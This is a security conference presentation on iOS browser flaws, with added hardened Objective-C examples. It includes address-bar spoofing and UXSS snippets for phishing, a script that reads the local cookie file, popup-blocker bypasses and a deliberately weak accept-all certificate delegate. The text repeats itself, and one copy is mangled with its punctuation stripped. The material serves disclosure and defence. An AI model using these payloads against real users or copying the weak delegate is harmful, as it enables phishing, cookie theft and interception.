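The weak setting beside the corrected one, as an added example that is not the presentation's code: a browser that routes its traffic through an NSURLSession answers server-trust challenges in the delegate, and the two delegates below show the blanket-accept pattern behind the "silently accepted" figure and a per-host evaluation that keeps the platform default of rejecting invalid chains. TrustEverythingDelegate, TrustPolicyDelegate and ExceptionKey are names chosen here; the Security framework calls are standard.

```objective-c
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <CommonCrypto/CommonDigest.h>

// Added example: server-trust handling for a browser's network layer.

@interface TrustEverythingDelegate : NSObject <NSURLSessionDelegate>
@end
@implementation TrustEverythingDelegate
// WEAK: any chain, any host. Self-signed certificates pass without a dialog.
- (void)URLSession:(NSURLSession *)session
didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge
 completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential *))completionHandler {
    SecTrustRef trust = challenge.protectionSpace.serverTrust;
    completionHandler(NSURLSessionAuthChallengeUseCredential,
                      [NSURLCredential credentialForTrust:trust]);
}
@end

// Key for a remembered user exception: host, port and SHA-256 of the leaf
// certificate, so an exception covers exactly one server and one certificate.
static NSString *ExceptionKey(NSURLProtectionSpace *space, SecTrustRef trust) {
    SecCertificateRef leaf = SecTrustGetCertificateAtIndex(trust, 0);
    NSData *der = CFBridgingRelease(SecCertificateCopyData(leaf));
    unsigned char digest[CC_SHA256_DIGEST_LENGTH];
    CC_SHA256(der.bytes, (CC_LONG)der.length, digest);
    NSMutableString *hex = [NSMutableString stringWithCapacity:2 * CC_SHA256_DIGEST_LENGTH];
    for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) [hex appendFormat:@"%02x", digest[i]];
    return [NSString stringWithFormat:@"%@:%ld:%@", space.host, (long)space.port, hex];
}

@interface TrustPolicyDelegate : NSObject <NSURLSessionDelegate>
@property (nonatomic, strong) NSMutableSet<NSString *> *userExceptions;
@end
@implementation TrustPolicyDelegate
// HARDENED: evaluate the chain for the host of THIS connection. The delegate
// runs for every connection, subresources included, so a certificate valid for
// the main domain does not cover other hosts (the Opera Coast < 3.02 pattern).
- (void)URLSession:(NSURLSession *)session
didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge
 completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential *))completionHandler {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
        return;
    }
    SecTrustRef trust = space.serverTrust;
    SecPolicyRef policy = SecPolicyCreateSSL(true, (__bridge CFStringRef)space.host);
    SecTrustSetPolicies(trust, policy);
    CFRelease(policy);

    SecTrustResultType result = kSecTrustResultInvalid;
    BOOL valid = (SecTrustEvaluate(trust, &result) == errSecSuccess) &&
                 (result == kSecTrustResultUnspecified || result == kSecTrustResultProceed);
    if (valid || [self.userExceptions containsObject:ExceptionKey(space, trust)]) {
        completionHandler(NSURLSessionAuthChallengeUseCredential,
                          [NSURLCredential credentialForTrust:trust]);
    } else {
        // Same outcome as a stock UIWebView: the load fails, no dialog here.
        // Only an explicit user decision, taken elsewhere after the certificate
        // has been shown, adds ExceptionKey(space, trust) to userExceptions.
        completionHandler(NSURLSessionAuthChallengeCancelAuthenticationChallenge, nil);
    }
}
@end
```

Whatever the address bar shows as an SSL lock should be derived from this decision (a completed load whose every connection passed the hardened path), not from the URL's scheme.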
Password managers
• JavaScript with the privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
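The matching rule a browser's own password store should apply, as an added example that is not the presentation's code: a saved entry is filled only into the top document, and only when scheme, host and port all match, with the host-only comparison from the slide shown beside it. SavedLogin, WeakShouldFill, ShouldFill and LoginForSubmission are names chosen here.

```objective-c
#import <Foundation/Foundation.h>

// Added example: origin matching for autofill and for saving.
@interface SavedLogin : NSObject
@property (nonatomic, copy) NSString *scheme;    // e.g. "https"
@property (nonatomic, copy) NSString *host;      // e.g. "accounts.example.com" (constructed)
@property (nonatomic, assign) NSInteger port;    // e.g. 443
@property (nonatomic, copy) NSString *username;
@end
@implementation SavedLogin
@end

static NSInteger EffectivePort(NSURL *url) {
    if (url.port) return url.port.integerValue;
    NSString *scheme = url.scheme.lowercaseString;
    if ([scheme isEqualToString:@"https"]) return 443;
    if ([scheme isEqualToString:@"http"]) return 80;
    return -1;
}

// WEAK: host only. An http:// page on the same host receives the password the
// user saved for the https:// login form.
static BOOL WeakShouldFill(SavedLogin *login, NSURL *pageURL) {
    return pageURL.host != nil &&
           [login.host caseInsensitiveCompare:pageURL.host] == NSOrderedSame;
}

// HARDENED: full origin match against the TOP document. Callers pass
// webView.request.mainDocumentURL (UIWebView) or webView.URL (WKWebView), never
// a frame URL; the fill script runs with top-frame privileges anyway, so the
// decision is made on the top-frame URL alone and subframes are not filled.
static BOOL ShouldFill(SavedLogin *login, NSURL *topDocumentURL) {
    if (topDocumentURL.host.length == 0) return NO;            // about:blank, applewebdata://, file://
    if (![login.scheme isEqualToString:topDocumentURL.scheme.lowercaseString]) return NO;
    if ([login.host caseInsensitiveCompare:topDocumentURL.host] != NSOrderedSame) return NO;
    return login.port == EffectivePort(topDocumentURL);
}

// Saving is the mirror image: the entry is stored for the origin of the top
// document that submitted the form, never for an origin named by page content.
static SavedLogin *LoginForSubmission(NSURL *topDocumentURL, NSString *username) {
    if (topDocumentURL.host.length == 0) return nil;
    SavedLogin *login = [SavedLogin new];
    login.scheme = topDocumentURL.scheme.lowercaseString;
    login.host = topDocumentURL.host.lowercaseString;
    login.port = EffectivePort(topDocumentURL);
    login.username = username;
    return login;
}
```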
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)

Address Bar Spoofing: Untracked Content
Replace the window content with untracked content; document.write and/or data: URIs are usually good candidates
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7

Address Bar Spoofing: Init & Interrupt
Initialise the window with the target URL, replace it with phishing content before it loads
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)

Address Bar Spoofing: Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts

Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function(){ location = 'https://accounts.google.com:8443' }, …)

Address Bar Spoofing: Title bar
[screenshot: phishing page whose title imitates an address bar]
<title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock makes sense only if there was an actual successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding an SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
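The four address bar tips above applied to both web view classes, as an added example that is not the presentation's code: the bar is refreshed from the view's own state on every delegate event (the failure callback included) rather than from the request the app asked for, and the lock appears only after a completed https load. AddressBar, LegacyTab and ModernTab are names chosen here; lastLoadSucceeded is an assumption about how an app would track the outcome of the most recent load.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Added example: keep the address bar in sync with what the web view holds.
@interface AddressBar : NSObject
@property (nonatomic, strong) UILabel *urlLabel;
@property (nonatomic, strong) UIImageView *lockIcon;
@end
@implementation AddressBar
- (void)showURL:(NSURL *)url secure:(BOOL)secure {
    self.urlLabel.text = url ? url.absoluteString : @"";
    self.lockIcon.hidden = !secure;
}
@end

// UIWebView (iOS 7 and earlier): no URL property, so the delegate re-reads the
// view's own request at every event. A failed load is an event too: the bar
// then shows whatever the view still displays, not the URL that was attempted.
@interface LegacyTab : NSObject <UIWebViewDelegate>
@property (nonatomic, strong) AddressBar *bar;
@property (nonatomic, assign) BOOL lastLoadSucceeded;
@end
@implementation LegacyTab
- (void)syncBarWith:(UIWebView *)webView {
    NSURL *url = webView.request.mainDocumentURL;
    BOOL https = [url.scheme.lowercaseString isEqualToString:@"https"];
    // Lock only for a finished, successful https document; a pending or
    // failed navigation to an https URL earns nothing.
    [self.bar showURL:url secure:(https && self.lastLoadSucceeded && !webView.loading)];
}
- (BOOL)webView:(UIWebView *)webView shouldStartLoadWithRequest:(NSURLRequest *)request
 navigationType:(UIWebViewNavigationType)navigationType {
    return YES;   // not a bar update: this navigation has not happened yet
}
- (void)webViewDidStartLoad:(UIWebView *)webView {
    self.lastLoadSucceeded = NO;
    [self syncBarWith:webView];
}
- (void)webViewDidFinishLoad:(UIWebView *)webView {
    self.lastLoadSucceeded = YES;
    [self syncBarWith:webView];
}
- (void)webView:(UIWebView *)webView didFailLoadWithError:(NSError *)error {
    self.lastLoadSucceeded = NO;
    [self syncBarWith:webView];   // the failed target must not stay in the bar
}
@end

// WKWebView (iOS 8): observe the KVO-compliant URL, loading and
// hasOnlySecureContent properties; the bar follows the view, never the app.
@interface ModernTab : NSObject
@property (nonatomic, strong) WKWebView *webView;
@property (nonatomic, strong) AddressBar *bar;
@end
@implementation ModernTab
- (void)attach {
    for (NSString *key in @[@"URL", @"loading", @"hasOnlySecureContent"]) {
        [self.webView addObserver:self forKeyPath:key
                          options:NSKeyValueObservingOptionNew context:NULL];
    }
}
- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context {
    WKWebView *wv = self.webView;
    BOOL https = [wv.URL.scheme.lowercaseString isEqualToString:@"https"];
    [self.bar showURL:wv.URL secure:(https && wv.hasOnlySecureContent && !wv.loading)];
}
- (void)dealloc {
    for (NSString *key in @[@"URL", @"loading", @"hasOnlySecureContent"]) {
        [self.webView removeObserver:self forKeyPath:key];
    }
}
@end
```

The loading-loop and failed-navigation slides both exploit bars that are written in shouldStartLoadWithRequest:; moving every update into the callbacks that report the view's actual state is the change that closes that class of spoof.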
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
  → mb://exec/$(WINDOW_ID)/[ "command": "window.open", "target": "1234", "url": "about:blank" ]   (target id from Math.random())
  → [webView loadRequest: … "about:blank" …]
cross-frame forgery
w.document.write('Hi')
  → mb://exec/$(WINDOW_ID)/[ "command": "window.document.write", "target": "1234", "html": "Hi" ]
  → [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com

CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 22: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/22.jpg)
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
